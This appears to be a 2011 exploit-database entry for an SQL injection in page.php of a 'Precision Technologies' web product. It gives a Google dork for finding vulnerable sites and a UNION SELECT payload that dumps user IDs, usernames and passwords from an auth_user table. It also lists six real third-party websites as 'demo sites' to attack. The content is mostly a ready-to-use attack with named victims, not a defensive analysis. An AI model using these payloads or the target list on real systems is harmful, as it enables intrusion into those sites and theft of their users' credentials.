Precision Technologies(page.php)sql Injection Vulnerability



EKU-ID: 848 CVE: OSVDB-ID:
Author: Angel Injection Published: 2011-08-18 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


# Exploit Title:Precision Technologies(page.php)sql Injection Vulnerability
# Date: 17/8/2011
# Author: Angel Injection
# home Page: http://www.club-h.co.cc , http://www.sec-krb.org
# Email: Angel-Injection[at]hotmail.com
# Vendor or Software Link: http://www.pretechno.com
# Version: N/A
# Category:: webapps
# Google dork: intext:"powered by Precision Technologies" inurl:"page.php?id="
# Tested on: Back Track 5
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Exploit

http://localhost/page.php?id=1'

http://localhost/page.php?id=1[injection here]

http://www.localhost/page.php?id=-1+union+select+1,2,3,concat(uid,0x3a,username,0x3a,password),5,6,7,8,9,10+from+auth_user--

Demo sites
http://www.cibmrd.com/page.php?id=%27
http://www.nirmaltours.com/page.php?id=1%27
http://prakritiwomen.org/page.php?id=1
http://www.cardicareaipc.com/page.php?id=1%27
http://www.opaquegroup.com/page.php?id=1%27
http://synergy-pune.com/page.php?id=1%27


-- ------ ---------- ----------- ------- ------------- ------- --------- ------ ----
Thanks to all the people of Iraq And Club Hack Team